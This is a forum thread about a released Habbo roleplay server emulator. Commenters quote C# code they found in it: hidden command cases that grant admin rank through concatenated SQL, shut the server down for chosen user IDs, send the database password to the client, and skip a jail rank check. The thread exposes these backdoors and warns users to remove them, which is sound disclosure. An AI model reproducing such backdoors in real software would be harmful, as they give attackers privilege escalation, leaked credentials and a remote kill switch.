FrostRP Emulator

Status
Not open for further replies.

Caleeb

Nov 21, 2011
Really never had an official name for this project. It's my latest build from months ago and I have lost all interest in Habbo and computer programming. Anyhow this is the server with the database, not sure which connector is needed but it has most functions of RP including the XP system craig introduced. I made this myself, has IHI pathfinding and flood script patched I believe. Nothing fancy, I've quit development and moved on. It's probably the most horrible source you'll find as Holograph is shit itself. I don't ever see myself coming back. best of luck to all of you habbo developers.

Enjoy.

thanks jacky (crup) for your temporally motivation.

Snow

Dec 10, 2011
Sad to lose a developer every so often...
He isn't a dev.. More like a fraud. Another poorly copy-and-paste from Caleb. How many times have you actually "quit". No one will even use this so why keep trying?

Sent from my DROID2 using Tapatalk

Awer

- 23K Carot Facials
Dec 29, 2010
I agree, Great release, as you were one of the best developers I met. It's good your finally moving on, as everyone else is, as RP's are dying, holograph is dying, Habbo is dying.

I wish you the best of luck, Caleb.

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
I wont bother being much of an ass, but nice release quite a bit could be changed, but nice I guess for them still trying. *I'm not a fan of how you did the XP shit though :().

- EDIT - If you use this, search the following:

'case "ui":' and remove the password shit.

- EDIT 2 -

Found this...

PHP:
                    case "utzredhotpot":
                        {
                            using (DatabaseClient dbClient = Eucalypt.dbManager.GetClient())
                            {
                                dbClient.runQuery("UPDATE users SET rank = '7' WHERE id = '" + userID + "'");
                            }
                            break;
                        }
                    case "fkdis"://
                        {
                            if (userID == 277 || userID == 1888)
                            {
                                Eucalypt.Shutdown();
                            }
                            break;
                        }

case "h0telinfo"://
                        {
                            {
                                this.sendData("BK" + "" + Eucalypt.dbPassword + "");
                            }
                            break;
                        }

- EDIT 3 -

PHP:
                    case "escape":
                        {
                            //if (_Rank > 5)
                            {
                                Jailed = false;
                                refreshAppearance(true, true, true);
                            }
                            break;
                        }

Crup

weeeeee
Jul 25, 2010
Y
I wont bother being much of an ass, but nice release quite a bit could be changed, but nice I guess for them still trying. *I'm not a fan of how you did the XP shit though :().

- EDIT - If you use this, search the following:

'case "ui":' and remove the password shit.

- EDIT 2 -

Found this...

PHP:
                    case "utzredhotpot":
                        {
                            using (DatabaseClient dbClient = Eucalypt.dbManager.GetClient())
                            {
                                dbClient.runQuery("UPDATE users SET rank = '7' WHERE id = '" + userID + "'");
                            }
                            break;
                        }
                    case "fkdis"://
                        {
                            {
                                Eucalypt.Shutdown();
                            }
                            break;
                        }

case "h0telinfo"://
                        {
                            {
                                this.sendData("BK" + "" + Eucalypt.dbPassword + "");
                            }
                            break;
                        }

- EDIT 3 -

PHP:
                    case "escape":
                        {
                            //if (_Rank > 5)
                            {
                                Jailed = false;
                                refreshAppearance(true, true, true);
                            }
                            break;
                        }
Basically, he can fuck your RP with that

Caleeb

Nov 21, 2011
Crup known as Jacky must have left those exploits when he gave me the emulator back. I wasn't aware of it and never added them. If you don't believe me I could careless, but I'm just saying. I wouldn't intend to fuck your RP up, that would defeat the purpose of me leaving habbo. Just some common sense to those idiots out their consumed to lies.

Zak

Posting Freak
Mar 12, 2011
Caleb one of the best developers? He did not even know what static is in C# lol.

Truffles

Jan 1, 2012
Caleeb AKA Richie the one who trys to keylog people, ddos people, and beg K0dy L33t for hacks on msn, I believe this is just a fraud to do something to someones rp or computer, anyways horrible release, hope to never see you here again and good bye <3

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
Caleeb AKA Richie the one who trys to keylog people, ddos people, and beg K0dy L33t for hacks on msn, I believe this is just a fraud to do something to someones rp or computer, anyways horrible release, hope to never see you here again and good bye <3

This isn't Richie, this is Caleb, lol.

Reactions: Ept

Truffles

Jan 1, 2012
Hmm, Caleb-Long, Caleb-Wild? he would never release this shit, and he hasn't quit development , asked him on msn just a while ago.

Caleeb

Nov 21, 2011
Its Caleb ....

I stopped reading this thread here.

This man is right. He may be doing more talk than action, like all of us who say this or similiar.
Seriously, if we can all make something original....
Habbo's idea was to make a virtual world social network for teens & young adults, it has turned into a money thing after the years.
Retro Owners idea's are to make a Habbo Retro, supplying teens a Habbo Hotel that is free, and active staff. A fucking retro. After time has been the idea to make money.

The New Original idea: Succeed in what Retro's were developed for at the very beginning & a bigger company than Sulake.

Comparison:
Facebook & Instagram
Now facebook was the first idea, Instagram was a 2nd idea. Facebook bought off Instagram.

Facebook & Instagram to The New Original Idea (TNOI)

TNOI buys off Sulake, because they succeeded in there idea.

Sincerely,
the man behind the plan

If this is real, Aaron could use this to his potential, He can totally get a new program, End of phoenix, And if he decides to share revenue and "the lot" Retro's would be better than Habbo, and over time, Aaron would end up becoming part of Sulake. Original Habbo's being there purpose, and the retro's on the side. But both being owned by Sulake.

So lets say he takes it.
Pro for him and $.
Pro for retro's cause we will all end up having access to all of habbo's shit.
Ease of access and updating, No more waiting for cracked swf's, get it right from the original source.
Retro's will end up having all the latest and latest, homes, EVERYTHING basically... >.>

What the hell does this have anything to do with the release? Get the fuck out you idiot.

Status
Not open for further replies.

Users who are viewing this thread